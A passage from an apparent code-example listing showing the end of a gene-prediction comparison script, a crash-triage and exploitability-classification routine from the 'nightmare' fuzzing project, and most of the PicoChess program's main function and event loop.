    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)

Example 157

Project: nightmare Source File: vtrace_iface.py
def main(args):
  crash_data_dict = None
  tr = vtrace.getTrace()
  
  global timeout
  if os.getenv("NIGHTMARE_TIMEOUT"):
    timeout = float(os.getenv("NIGHTMARE_TIMEOUT"))

  if args[0] in ["--attach", "-A"]:
    if len(args) == 1:
      usage()
      sys.exit(1)
    else:
      pid = int(args[1])
      if timeout != 0:
        # Schedule a timer to detach from the process after some seconds
        timer = threading.Timer(timeout, kill_process, (tr, False, ))
        timer.start()
      tr.attach(pid)
  else:    
    if timeout != 0:
      # Schedule a timer to kill the process after 5 seconds
      timer = threading.Timer(timeout, kill_process, (tr, True, ))
      timer.start()

    cmd = args
    if type(args) is list:
      cmd = " ".join(args)

    tr.execute(" ".join(args))
    tr.run()

  signal = tr.getCurrentSignal()
  signal_name = signal_to_name(signal)
  ignore_list = ["Unknown", "SIGUSR1", "SIGUSR2", "SIGTTIN", "SIGPIPE", "SIGINT"]
  while signal is None or signal_name in ignore_list:
    signal = tr.getCurrentSignal()
    signal_name = signal_to_name(signal)
    try:
      tr.run()
    except:
      break

  if timeout != 0:
    timer.cancel()
  # Don't do anything else, the process is gone
  if os.name != "nt" and not tr.attached:
    return None

  if signal is not None:
    print tr, hex(signal)
    print " ".join(sys.argv)
    crash_name = os.getenv("NFP_INFO_CRASH")

    # Create the object to store all the crash data
    crash_data = CCrashData(tr.getProgramCounter(), sig2name(signal))
    if crash_name is None:
      crash_name = "info.crash"
    #f = open(crash_name, "wb")

    exploitability_reason = None
    if os.name != "nt" and signal == 4:
      # Due to illegal instruction
      exploitable = EXPLOITABLE
      exploitability_reason = "Illegal instruction"
    elif os.name == "nt" and signal in [0xc0000096, 0xc000001d]:
      # Due to illegal or privileged instruction
      exploitable = EXPLOITABLE
      if signal == 0xc000001d:
        exploitability_reason = "Illegal instruction"
      else:
        exploitability_reason = "Privileged instruction"
    else:
      exploitable = NOT_EXPLOITABLE

    crash_data.add_data("process", "pid", tr.getPid())
    if os.name == "nt":
      print "Process %d crashed with exception 0x%x (%s)" % (tr.getPid(), signal, win32_exc_to_name(signal))
    else:
      print "Process %d crashed with signal %d (%s)" % (tr.getPid(), signal, signal_to_name(signal))

    i = 0
    for t in tr.getThreads():
      i += 1
      crash_data.add_data("threads", "%d" % i, t)

    stack_trace = tr.getStackTrace()
    total = len(stack_trace)
    i = 0
    for x in stack_trace:
      i += 1
      sym = tr.getSymByAddr(x[0], exact=False)
      if sym is None:
        sym = ""
      
      crash_data.add_data("stack trace", "%d" % i, [x[0], str(sym)])
      total -= 1

    regs = tr.getRegisterContext().getRegisters()
    for reg in regs:
      crash_data.add_data("registers", reg, regs[reg])
      if reg.startswith("r"):
        line = reg.ljust(5) + "%016x" % regs[reg]
        try:
          mem = tr.readMemory(regs[reg], 32)
          mem = base64.b64encode(mem)
          crash_data.add_data("registers memory", reg, mem)
          line += "\t" + repr(mem)
        except:
          pass

    for reg in COMMON_REGS:
      if reg in regs:
        if reg in crash_data.data["registers memory"]:
          print reg, hex(regs[reg]), repr(base64.b64decode(crash_data.data["registers memory"][reg]))
        else:
          print reg, hex(regs[reg])
    print

    total_around = 40
    if 'rip' in regs or 'rsp' in regs or 'rbp' in regs:
      if len("%08x" % regs['rip']) > 8 or len("%08x" % regs['rsp']) > 8 or len("%08x" % regs['rbp']) > 8:
        mode = CS_MODE_64
      else:
        mode = CS_MODE_32
    else:
      mode = CS_MODE_32

    md = Cs(CS_ARCH_X86, mode)
    md.skipdata = True
    pc = tr.getProgramCounter()
    crash_mnem = None
    crash_ops = None
    try:
      pc_mem = tr.readMemory(pc-total_around/2, total_around)
      offset = regs["rip"]-total_around/2

      ret = []
      found = False
      for x in md.disasm(pc_mem, 0):
        line = "%016x %s %s" % ((offset + x.address), x.mnemonic, x.op_str)
        crash_data.add_data("disassembly", offset + x.address, "%s %s" %(x.mnemonic, x.op_str))
        if offset + x.address == pc:
          crash_data.disasm = [x.address + offset, "%s %s" %(x.mnemonic, x.op_str)]
          line += "\t\t<--------- CRASH"
          print line
          found = True
        ret.append(line)

      if not found:
        offset = pc = tr.getProgramCounter()
        pc_mem = tr.readMemory(pc, total_around)
        for x in md.disasm(pc_mem, 0):
          line = "%016x %s %s" % ((offset + x.address), x.mnemonic, x.op_str)
          if offset + x.address == pc:
            line += "\t\t<--------- CRASH"
            crash_data.disasm = [x.address + offset, "%s %s" % (x.mnemonic, x.op_str)]
          print line
    except:
      # Due to invalid memory at $PC
      if signal != 6:
        exploitable = True
        exploitability_reason = "Invalid memory at program counter"
      print "Exception:", sys.exc_info()[1]

    if crash_mnem:
      if crash_mnem in ["call", "jmp"] or \
         crash_mnem.startswith("jmp") or \
         crash_mnem.startswith("call"):
        if crash_ops.find("[") > -1:
          # Due to jump/call with a register that maybe controllable
          exploitable = EXPLOITABLE
          exploitability_reason = "Jump or call with a probably controllable register"
      elif crash_mnem.startswith(".byte"):
        # Due to illegal instruction
        exploitable = MAYBE_EXPLOITABLE
        exploitability_reason = "Illegal instruction"
      elif crash_mnem.startswith("in") or \
           crash_mnem.startswith("out") or \
           crash_mnem in ["hlt", "iret", "clts", "lgdt", "lidt",
                                     "lldt", "lmsw", "ltr", "cli", "sti"]:
        if crash_mnem != "int":
          # Due to privileged instruction (which makes no sense in user-land)
          exploitable = MAYBE_EXPLOITABLE
          exploitability_reason = "Privileged instruction"

    #print >>f
    #print >>f, "Maps:"
    i = 0
    for m in tr.getMemoryMaps():
      i += 1
      line = "%016x %s %s %s" % (m[0], str(m[1]).rjust(8), get_permision_str(m[2]), m[3])
      crash_data.add_data("memory maps", "%d" % i, m)
      #print >>f, line

    #print >>f
    if exploitable > 0:
      crash_data.exploitable = is_exploitable(exploitable)
      crash_data.add_data("exploitability", "reason", exploitability_reason)
      #print >>f, "Exploitable: %s. %s." % (is_exploitable(exploitable), exploitability_reason)
    else:
      #print >>f, "Exploitable: Unknown."
      pass

    crash_data_buf = crash_data.dump_json()
    crash_data_dict = crash_data.dump_dict()
    print "Yep, we got a crash! \o/"
    print
    #print "Dumping JSON...."
    #print crash_data_buf
    #print 

  if tr.attached:
    try:
      tr.kill()
    except:
      pass
  try:
    tr.release()
  except:
    pass

  return crash_data_dict

Example 158

Project: picochess Source File: picochess.py
Function: main
def main():

    def display_system_info():
        if args.enable_internet:
            place = get_location()
            addr = get_ip()
        else:
            place = '?'
            addr = None
        DisplayMsg.show(Message.SYSTEM_INFO(info={'version': version, 'location': place, 'ip': addr,
                                                  'engine_name': engine_name, 'user_name': user_name
                                                  }))

    def compute_legal_fens(g):
        """
        Compute a list of legal FENs for the given game.
        :param g: The game
        :return: A list of legal FENs
        """
        fens = []
        for move in g.legal_moves:
            g.push(move)
            fens.append(g.board_fen())
            g.pop()
        return fens

    def probe_tablebase(game):
        if not gaviota:
            return None
        score = gaviota.probe_dtm(game)
        if score is not None:
            Observable.fire(Event.NEW_SCORE(score='gaviota', mate=score))
        return score

    def think(game, tc):
        """
        Start a new search on the current game.
        If a move is found in the opening book, fire an event in a few seconds.
        :return:
        """
        start_clock()
        book_move = searchmoves.book(bookreader, game)
        if book_move:
            Observable.fire(Event.BEST_MOVE(result=book_move, inbook=True))
        else:
            probe_tablebase(game)
            while not engine.is_waiting():
                time.sleep(0.1)
                logging.warning('engine is still not waiting')
            engine.position(copy.deepcopy(game))
            uci_dict = tc.uci()
            uci_dict['searchmoves'] = searchmoves.all(game)
            engine.go(uci_dict)

    def analyse(game):
        """
        Start a new ponder search on the current game.
        :return:
        """
        probe_tablebase(game)
        engine.position(copy.deepcopy(game))
        engine.ponder()

    def observe(game):
        """
        Starts a new ponder search on the current game.
        :return:
        """
        start_clock()
        analyse(game)

    def stop_search_and_clock():
        if interaction_mode == Mode.NORMAL:
            stop_clock()
        elif interaction_mode in (Mode.REMOTE, Mode.OBSERVE):
            stop_clock()
            stop_search()
        elif interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
            stop_search()

    def stop_search():
        """
        Stop current search.
        :return:
        """
        engine.stop()

    def stop_clock():
        if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
            time_control.stop()
            DisplayMsg.show(Message.CLOCK_STOP())
        else:
            logging.warning('wrong mode: {}'.format(interaction_mode))

    def start_clock():
        if interaction_mode in (Mode.NORMAL, Mode.OBSERVE, Mode.REMOTE):
            time_control.start(game.turn)
            DisplayMsg.show(Message.CLOCK_START(turn=game.turn, time_control=time_control))
        else:
            logging.warning('wrong mode: {}'.format(interaction_mode))

    def check_game_state(game, play_mode):
        """
        Check if the game has ended or not ; it also sends Message to Displays if the game has ended.
        :param game:
        :param play_mode:
        :return: True is the game continues, False if it has ended
        """
        result = None
        if game.is_stalemate():
            result = GameResult.STALEMATE
        if game.is_insufficient_material():
            result = GameResult.INSUFFICIENT_MATERIAL
        if game.is_seventyfive_moves():
            result = GameResult.SEVENTYFIVE_MOVES
        if game.is_fivefold_repetition():
            result = GameResult.FIVEFOLD_REPETITION
        if game.is_checkmate():
            result = GameResult.MATE

        if result is None:
            return True
        else:
            DisplayMsg.show(Message.GAME_ENDS(result=result, play_mode=play_mode, game=game.copy()))
            return False

    def user_move(move):
        logging.debug('user move [%s]', move)
        if move not in game.legal_moves:
            logging.warning('Illegal move [%s]', move)
        else:
            handle_move(move=move)

    def process_fen(fen):
        nonlocal last_computer_fen
        nonlocal last_legal_fens
        nonlocal searchmoves
        nonlocal legal_fens

        # Check for same position
        if (fen == game.board_fen() and not last_computer_fen) or fen == last_computer_fen:
            logging.debug('Already in this fen: ' + fen)

        # Check if we have to undo a previous move (sliding)
        elif fen in last_legal_fens:
            if interaction_mode == Mode.NORMAL:
                if (play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or \
                        (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE):
                    stop_search()
                    game.pop()
                    logging.debug('User move in computer turn, reverting to: ' + game.board_fen())
                elif last_computer_fen:
                    last_computer_fen = None
                    game.pop()
                    game.pop()
                    logging.debug('User move while computer move is displayed, reverting to: ' + game.board_fen())
                else:
                    logging.error("last_legal_fens not cleared: " + game.board_fen())
            elif interaction_mode == Mode.REMOTE:
                if (play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or \
                        (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE):
                    game.pop()
                    logging.debug('User move in remote turn, reverting to: ' + game.board_fen())
                elif last_computer_fen:
                    last_computer_fen = None
                    game.pop()
                    game.pop()
                    logging.debug('User move while remote move is displayed, reverting to: ' + game.board_fen())
                else:
                    logging.error('last_legal_fens not cleared: ' + game.board_fen())
            else:
                game.pop()
                logging.debug('Wrong color move -> sliding, reverting to: ' + game.board_fen())
            legal_moves = list(game.legal_moves)
            user_move(legal_moves[last_legal_fens.index(fen)])
            if interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE:
                legal_fens = []
            else:
                legal_fens = compute_legal_fens(game)

        # legal move
        elif fen in legal_fens:
            time_control.add_inc(game.turn)
            legal_moves = list(game.legal_moves)
            user_move(legal_moves[legal_fens.index(fen)])
            last_legal_fens = legal_fens
            if interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE:
                legal_fens = []
            else:
                legal_fens = compute_legal_fens(game)

        # Player had done the computer or remote move on the board
        elif last_computer_fen and fen == game.board_fen():
            last_computer_fen = None
            if check_game_state(game, play_mode) and interaction_mode in (Mode.NORMAL, Mode.REMOTE):
                # finally reset all alternative moves see: handle_move()
                nonlocal searchmoves
                searchmoves.reset()
                time_control.add_inc(not game.turn)
                if time_control.mode != TimeMode.FIXED:
                    start_clock()
                DisplayMsg.show(Message.COMPUTER_MOVE_DONE_ON_BOARD())
                legal_fens = compute_legal_fens(game)
            else:
                legal_fens = []
            last_legal_fens = []

        # Check if this is a previous legal position and allow user to restart from this position
        else:
            game_history = copy.deepcopy(game)
            if last_computer_fen:
                game_history.pop()
            while game_history.move_stack:
                game_history.pop()
                if game_history.board_fen() == fen:
                    logging.debug("Current game FEN      : {}".format(game.fen()))
                    logging.debug("Undoing game until FEN: {}".format(fen))
                    stop_search_and_clock()
                    while len(game_history.move_stack) < len(game.move_stack):
                        game.pop()
                    last_computer_fen = None
                    last_legal_fens = []
                    if (interaction_mode == Mode.REMOTE or interaction_mode == Mode.NORMAL) and \
                            ((play_mode == PlayMode.USER_WHITE and game_history.turn == chess.BLACK)
                              or (play_mode == PlayMode.USER_BLACK and game_history.turn == chess.WHITE)):
                        legal_fens = []
                        if interaction_mode == Mode.NORMAL:
                            searchmoves.reset()
                            if check_game_state(game, play_mode):
                                think(game, time_control)
                    else:
                        legal_fens = compute_legal_fens(game)

                    if interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
                        analyse(game)
                    elif interaction_mode in (Mode.OBSERVE, Mode.REMOTE):
                        observe(game)
                    start_clock()
                    DisplayMsg.show(Message.USER_TAKE_BACK())
                    break

    def set_wait_state(start_search=True):
        if interaction_mode == Mode.NORMAL:
            nonlocal play_mode
            play_mode = PlayMode.USER_WHITE if game.turn == chess.WHITE else PlayMode.USER_BLACK
        if start_search:
            # Go back to analysing or observing
            if interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ, Mode.PONDER):
                analyse(game)
            if interaction_mode in (Mode.OBSERVE, Mode.REMOTE):
                observe(game)

    def handle_move(move, ponder=None, inbook=False):
        nonlocal game
        nonlocal last_computer_fen
        nonlocal searchmoves
        fen = game.fen()
        turn = game.turn

        # clock must be stoped BEFORE the "book_move" event cause SetNRun resets the clock display
        stop_search_and_clock()

        # engine or remote move
        if (interaction_mode == Mode.NORMAL or interaction_mode == Mode.REMOTE) and \
                ((play_mode == PlayMode.USER_WHITE and game.turn == chess.BLACK) or
                     (play_mode == PlayMode.USER_BLACK and game.turn == chess.WHITE)):
            last_computer_fen = game.board_fen()
            game.push(move)
            if inbook:
                DisplayMsg.show(Message.BOOK_MOVE())
            searchmoves.add(move)
            text = Message.COMPUTER_MOVE(move=move, ponder=ponder, fen=fen, turn=turn, game=game.copy(),
                                         time_control=time_control, wait=inbook)
            DisplayMsg.show(text)
        else:
            last_computer_fen = None
            game.push(move)
            if inbook:
                DisplayMsg.show(Message.BOOK_MOVE())
            searchmoves.reset()
            if interaction_mode == Mode.NORMAL:
                if check_game_state(game, play_mode):
                    think(game, time_control)
                text = Message.USER_MOVE(move=move, fen=fen, turn=turn, game=game.copy())
            elif interaction_mode == Mode.REMOTE:
                if check_game_state(game, play_mode):
                    observe(game)
                text = Message.USER_MOVE(move=move, fen=fen, turn=turn, game=game.copy())
            elif interaction_mode == Mode.OBSERVE:
                if check_game_state(game, play_mode):
                    observe(game)
                text = Message.REVIEW_MOVE(move=move, fen=fen, turn=turn, game=game.copy(), mode=interaction_mode)
            else:  # interaction_mode in (Mode.ANALYSIS, Mode.KIBITZ):
                if check_game_state(game, play_mode):
                    analyse(game)
                text = Message.REVIEW_MOVE(move=move, fen=fen, turn=turn, game=game.copy(), mode=interaction_mode)
            DisplayMsg.show(text)

    def transfer_time(time_list):
        def num(ts):
            try:
                return int(ts)
            except ValueError:
                return 1

        if len(time_list) == 1:
            secs = num(time_list[0])
            time_control = TimeControl(TimeMode.FIXED, seconds_per_move=secs)
            text = dgttranslate.text('B00_tc_fixed', '{:2d}'.format(secs))
        elif len(time_list) == 2:
            mins = num(time_list[0])
            finc = num(time_list[1])
            if finc == 0:
                time_control = TimeControl(TimeMode.BLITZ, minutes_per_game=mins)
                text = dgttranslate.text('B00_tc_blitz', '{:2d}'.format(mins))
            else:
                time_control = TimeControl(TimeMode.FISCHER, minutes_per_game=mins, fischer_increment=finc)
                text = dgttranslate.text('B00_tc_fisch', '{:2d} {:2d}'.format(mins, finc))
        else:
            time_control = TimeControl(TimeMode.BLITZ, minutes_per_game=5)
            text = dgttranslate.text('B00_tc_blitz', ' 5')
        return time_control, text

    def get_engine_level_dict(engine_level):
        from engine import get_installed_engines

        installed_engines = get_installed_engines(engine.get_shell(), engine.get_file())
        for index in range(0, len(installed_engines)):
            eng = installed_engines[index]
            if eng['file'] == engine.get_file():
                level_list = sorted(eng['level_dict'])
                try:
                    level_index = level_list.index(engine_level)
                    return eng['level_dict'][level_list[level_index]]
                except ValueError:
                    break
        return {}

    # Enable garbage collection - needed for engine swapping as objects orphaned
    gc.enable()

    # Command line argument parsing
    parser = configargparse.ArgParser(default_config_files=[os.path.join(os.path.dirname(__file__), 'picochess.ini')])
    parser.add_argument('-e', '--engine', type=str, help='UCI engine executable path', default=None)
    parser.add_argument('-el', '--engine-level', type=str, help='UCI engine level', default=None)
    parser.add_argument('-d', '--dgt-port', type=str,
                        help='enable dgt board on the given serial port such as /dev/ttyUSB0')
    parser.add_argument('-b', '--book', type=str, help='full path of book such as books/b-flank.bin',
                        default='h-varied.bin')
    parser.add_argument('-t', '--time', type=str, default='5 0',
                        help="Time settings <FixSec> or <StMin IncSec> like '10'(move) or '5 0'(game) '3 2'(fischer)")
    parser.add_argument('-g', '--enable-gaviota', action='store_true', help='enable gavoita tablebase probing')
    parser.add_argument('-leds', '--enable-revelation-leds', action='store_true', help='enable Revelation leds')
    parser.add_argument('-l', '--log-level', choices=['notset', 'debug', 'info', 'warning', 'error', 'critical'],
                        default='warning', help='logging level')
    parser.add_argument('-lf', '--log-file', type=str, help='log to the given file')
    parser.add_argument('-rs', '--remote-server', type=str, help='remote server running the engine')
    parser.add_argument('-ru', '--remote-user', type=str, help='remote user on server running the engine')
    parser.add_argument('-rp', '--remote-pass', type=str, help='password for the remote user')
    parser.add_argument('-rk', '--remote-key', type=str, help='key file used to connect to the remote server')
    parser.add_argument('-pf', '--pgn-file', type=str, help='pgn file used to store the games', default='games.pgn')
    parser.add_argument('-pu', '--pgn-user', type=str, help='user name for the pgn file', default=None)
    parser.add_argument('-ar', '--auto-reboot', action='store_true', help='reboot system after update')
    parser.add_argument('-web', '--web-server', dest='web_server_port', nargs='?', const=80, type=int, metavar='PORT',
                        help='launch web server')
    parser.add_argument('-m', '--email', type=str, help='email used to send pgn files', default=None)
    parser.add_argument('-ms', '--smtp-server', type=str, help='adress of email server', default=None)
    parser.add_argument('-mu', '--smtp-user', type=str, help='username for email server', default=None)
    parser.add_argument('-mp', '--smtp-pass', type=str, help='password for email server', default=None)
    parser.add_argument('-me', '--smtp-encryption', action='store_true',
                        help='use ssl encryption connection to smtp-Server')
    parser.add_argument('-mf', '--smtp-from', type=str, help='From email', default='[email protected]')
    parser.add_argument('-mk', '--mailgun-key', type=str, help='key used to send emails via Mailgun Webservice',
                        default=None)
    parser.add_argument('-bc', '--beep-config', choices=['none', 'some', 'all'], help='sets standard beep config',
                        default='some')
    parser.add_argument('-beep', '--beep-level', type=int, default=0x03,
                        help='sets (some-)beep level from 0(=no beeps) to 15(=all beeps)')
    parser.add_argument('-uvoice', '--user-voice', type=str, help='voice for user', default=None)
    parser.add_argument('-cvoice', '--computer-voice', type=str, help='voice for computer', default=None)
    parser.add_argument('-inet', '--enable-internet', action='store_true', help='enable internet lookups')
    parser.add_argument('-nook', '--disable-ok-message', action='store_true', help='disable ok confirmation messages')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s version {}'.format(version),
                        help='show current version', default=None)
    parser.add_argument('-pi', '--dgtpi', action='store_true', help='use the dgtpi hardware')
    parser.add_argument('-lang', '--language', choices=['en', 'de', 'nl', 'fr', 'es'], default='en',
                        help='picochess language')
    parser.add_argument('-c', '--console', action='store_true', help='use console interface')

    args = parser.parse_args()
    if args.engine is None:
        el = read_engine_ini()
        args.engine = el[0]['file']  # read the first engine filename and use it as standard

    # Enable logging
    if args.log_file:
        handler = RotatingFileHandler('logs' + os.sep + args.log_file, maxBytes=1024*1024, backupCount=9)
        logging.basicConfig(level=getattr(logging, args.log_level.upper()),
                            format='%(asctime)s.%(msecs)03d %(levelname)5s %(module)10s - %(funcName)s: %(message)s',
                            datefmt="%Y-%m-%d %H:%M:%S", handlers=[handler])
    logging.getLogger('chess.uci').setLevel(logging.INFO)  # don't want to get so many python-chess uci messages

    logging.debug('#'*20 + ' PicoChess v' + version + ' ' + '#'*20)
    # log the startup parameters but hide the password fields
    p = copy.copy(vars(args))
    p['mailgun_key'] = p['remote_key'] = p['remote_pass'] = p['smtp_pass'] = 'cuem*'
    logging.debug('startup parameters: {}'.format(p))

    # Update
    if args.enable_internet:
        update_picochess(args.auto_reboot)

    gaviota = None
    if args.enable_gaviota:
        try:
            gaviota = chess.gaviota.open_tablebases('tablebases/gaviota')
            logging.debug('Tablebases gaviota loaded')
        except OSError:
            logging.error('Tablebases gaviota doesnt exist')
            gaviota = None

    # The class dgtDisplay talks to DgtHw/DgtPi or DgtVr
    dgttranslate = DgtTranslate(args.beep_config, args.beep_level, args.language)
    DgtDisplay(args.disable_ok_message, dgttranslate).start()

    # Launch web server
    if args.web_server_port:
        WebServer(args.web_server_port).start()

    dgtserial = DgtSerial(args.dgt_port, args.enable_revelation_leds, args.dgtpi)

    if args.console:
        # Enable keyboard input and terminal display
        logging.debug('starting picochess in virtual mode')
        KeyboardInput(dgttranslate, args.dgtpi).start()
        TerminalDisplay().start()
        DgtVr(dgtserial, dgttranslate).start()
    else:
        # Connect to DGT board
        logging.debug('starting picochess in board mode')
        if args.dgtpi:
            DgtPi(dgtserial, dgttranslate).start()
        DgtHw(dgtserial, dgttranslate).start()
    # Save to PGN
    emailer = Emailer(
        net=args.enable_internet, email=args.email, mailgun_key=args.mailgun_key,
        smtp_server=args.smtp_server, smtp_user=args.smtp_user,
        smtp_pass=args.smtp_pass, smtp_encryption=args.smtp_encryption, smtp_from=args.smtp_from)

    PgnDisplay(args.pgn_file, emailer).start()
    if args.pgn_user:
        user_name = args.pgn_user
    else:
        if args.email:
            user_name = args.email.split('@')[0]
        else:
            user_name = 'Player'

    # Create PicoTalker for speech output
    if args.user_voice or args.computer_voice:
        from talker.picotalker import PicoTalkerDisplay
        logging.debug("initializing PicoTalker [%s, %s]", str(args.user_voice), str(args.computer_voice))
        PicoTalkerDisplay(args.user_voice, args.computer_voice).start()
    else:
        logging.debug('PicoTalker disabled')

    # Gentlemen, start your engines...
    engine = UciEngine(args.engine, hostname=args.remote_server, username=args.remote_user,
                       key_file=args.remote_key, password=args.remote_pass)
    try:
        engine_name = engine.get().name
    except AttributeError:
        logging.error('no engines started')
        sys.exit(-1)

    # Startup - internal
    game = chess.Board()  # Create the current game
    legal_fens = compute_legal_fens(game)  # Compute the legal FENs
    all_books = get_opening_books()
    try:
        book_index = [book['file'] for book in all_books].index(args.book)
    except ValueError:
        logging.warning("selected book not present, defaulting to %s", all_books[7]['file'])
        book_index = 7
    bookreader = chess.polyglot.open_reader(all_books[book_index]['file'])
    searchmoves = AlternativeMover()
    interaction_mode = Mode.NORMAL
    play_mode = PlayMode.USER_WHITE

    last_computer_fen = None
    last_legal_fens = []
    game_declared = False  # User declared resignation or draw

    engine.startup(get_engine_level_dict(args.engine_level))

    # Startup - external
    time_control, time_text = transfer_time(args.time.split())
    time_text.beep = False
    if args.engine_level:
        level_text = dgttranslate.text('B00_level', args.engine_level)
        level_text.beep = False
    else:
        level_text = None
    DisplayMsg.show(Message.STARTUP_INFO(info={'interaction_mode': interaction_mode, 'play_mode': play_mode,
                                               'books': all_books, 'book_index': book_index, 'level_text': level_text,
                                               'time_control': time_control, 'time_text': time_text}))
    DisplayMsg.show(Message.ENGINE_STARTUP(shell=engine.get_shell(), file=engine.get_file(),
                                           has_levels=engine.has_levels(), has_960=engine.has_chess960()))

    system_info_thread = threading.Timer(0, display_system_info)
    system_info_thread.start()

    # Event loop
    logging.info('evt_queue ready')
    while True:
        try:
            event = evt_queue.get()
        except queue.Empty:
            pass
        else:
            logging.debug('received event from evt_queue: %s', event)
            for case in switch(event):
                if case(EventApi.FEN):
                    process_fen(event.fen)
                    break

                if case(EventApi.KEYBOARD_MOVE):
                    move = event.move
                    logging.debug('keyboard move [%s]', move)
                    if move not in game.legal_moves:
                        logging.warning('illegal move [%s]', move)
                    else:
                        g = copy.deepcopy(game)
                        g.push(move)
                        fen = g.fen().split(' ')[0]
                        if event.flip_board:
                            fen = fen[::-1]
                        DisplayMsg.show(Message.KEYBOARD_MOVE(fen=fen))
                    break

                if case(EventApi.LEVEL):
                    if event.options:
                        engine.startup(event.options, False)
                    DisplayMsg.show(Message.LEVEL(level_text=event.level_text))
                    break

                if case(EventApi.NEW_ENGINE):
                    config = ConfigObj('picochess.ini')
                    config['engine'] = event.eng['file']
                    config.write()
                    old_file = engine.get_file()
                    engine_shutdown = True
                    # Stop the old engine cleanly
                    engine.stop()
                    # Closeout the engine process and threads
                    # The all return non-zero error codes, 0=success
                    if engine.quit():  # Ask nicely
                        if engine.terminate():  # If you won't go nicely.... 
                            if engine.kill():  # Right that does it!
                                logging.error('engine shutdown failure')
                                DisplayMsg.show(Message.ENGINE_FAIL())
                                engine_shutdown = False
                    if engine_shutdown:
                        # Load the new one and send args.
                        # Local engines only
                        engine_fallback = False
                        engine = UciEngine(event.eng['file'])
                        try:
                            engine_name = engine.get().name
                        except AttributeError:
                            # New engine failed to start, restart old engine
                            logging.error("new engine failed to start, reverting to %s", old_file)
                            engine_fallback = True
                            event.options = {}  # Reset options. This will load the last(=strongest?) level
                            engine = UciEngine(old_file)
                            try:
                                engine_name = engine.get().name
                            except AttributeError:
                                # Help - old engine failed to restart. There is no engine
                                logging.error('no engines started')
                                sys.exit(-1)
                        # Schedule cleanup of old objects
                        gc.collect()
                        engine.startup(event.options)
                        # All done - rock'n'roll
                        if not engine_fallback:
                            DisplayMsg.show(Message.ENGINE_READY(eng=event.eng, engine_name=engine_name,
                                                                 eng_text=event.eng_text,
                                                                 has_levels=engine.has_levels(),
                                                                 has_960=engine.has_chess960(), ok_text=event.ok_text))
                        else:
                            DisplayMsg.show(Message.ENGINE_FAIL())
                        set_wait_state(not engine_fallback)
                    break

                if case(EventApi.SETUP_POSITION):
                    logging.debug("setting up custom fen: {}".format(event.fen))
                    uci960 = event.uci960

                    if game.move_stack:
                        if not (game.is_game_over() or game_declared):
                            DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    game = chess.Board(event.fen, uci960)
                    # see new_game
                    stop_search_and_clock()
                    if engine.has_chess960():
                        engine.option('UCI_Chess960', uci960)
                        engine.send()
                    legal_fens = compute_legal_fens(game)
                    last_legal_fens = []
                    last_computer_fen = None
                    time_control.reset()
                    searchmoves.reset()
                    DisplayMsg.show(Message.START_NEW_GAME(time_control=time_control, game=game.copy()))
                    game_declared = False
                    set_wait_state()
                    break

                if case(EventApi.NEW_GAME):
                    logging.debug('starting a new game with code: {}'.format(event.pos960))
                    uci960 = event.pos960 != 518

                    if game.move_stack:
                        if not (game.is_game_over() or game_declared):
                            DisplayMsg.show(Message.GAME_ENDS(result=GameResult.ABORT, play_mode=play_mode, game=game.copy()))
                    game = chess.Board()
                    if uci960:
                        game.set_chess960_pos(event.pos960)
                    # see setup_position
                    stop_search_and_clock()
                    if engine.has_chess960():
                        engine.option('UCI_Chess960', uci960)
                        engine.send()
                    legal_fens = compute_legal_fens(game)
                    last_legal_fens = []
                    last_computer_fen = None
                    time_control.reset()
                    searchmoves.reset()
                    DisplayMsg.show(Message.START_NEW_GAME(time_control=time_control, game=game.copy()))
                    game_declared = False
                    set_wait_state()
                    break

                if case(EventApi.PAUSE_RESUME):
                    if engine.is_thinking():
                        stop_clock()
                        engine.stop(show_best=True)
                    else:
                        if time_control.is_ticking():
                            stop_clock()
                        else:
                            start_clock()
                    break

                if case(EventApi.ALTERNATIVE_MOVE):
                    if last_computer_fen:
                        last_computer_fen = None
                        game.pop()
                        DisplayMsg.show(Message.ALTERNATIVE_MOVE())
                        think(game, time_control)
                    break

                if case(EventApi.SWITCH_SIDES):
                    if interaction_mode == Mode.NORMAL:
                        user_to_move = False
                        last_legal_fens = []

                        if engine.is_thinking():
                            stop_clock()
                            engine.stop(show_best=False)
                            user_to_move = True
                        if event.engine_finished:
                            last_computer_fen = None
                            move = game.pop()
                            user_to_move = True
                        else:
                            move = chess.Move.null()
                        if user_to_move:
                            last_legal_fens = []
                            play_mode = PlayMode.USER_WHITE if game.turn == chess.WHITE else PlayMode.USER_BLACK
                        else:
                            play_mode = PlayMode.USER_WHITE if game.turn == chess.BLACK else PlayMode.USER_BLACK

                        if not user_to_move and check_game_state(game, play_mode):
                            time_control.reset_start_time()
                            think(game, time_control)
                            legal_fens = []
                        else:
                            start_clock()
                            legal_fens = compute_legal_fens(game)

                        text = dgttranslate.text(play_mode.value)
                        DisplayMsg.show(Message.PLAY_MODE(play_mode=play_mode, play_mode_text=text))

                        if event.engine_finished:
                            DisplayMsg.show(Message.SWITCH_SIDES(move=move))
                    break

                if case(EventApi.DRAWRESIGN):
                    if not game_declared:  # in case user leaves kings in place while moving other pieces
                        stop_search_and_clock()
                        DisplayMsg.show(Message.GAME_ENDS(result=event.result, play_mode=play_mode, game=game.copy()))
                        game_declared = True
                    break

                if case(EventApi.REMOTE_MOVE):
                    if interaction_mode == Mode.REMOTE:
                        handle_move(move=chess.Move.from_uci(event.move))
                        legal_fens = compute_legal_fens(game)
                    break

                if case(EventApi.BEST_MOVE):
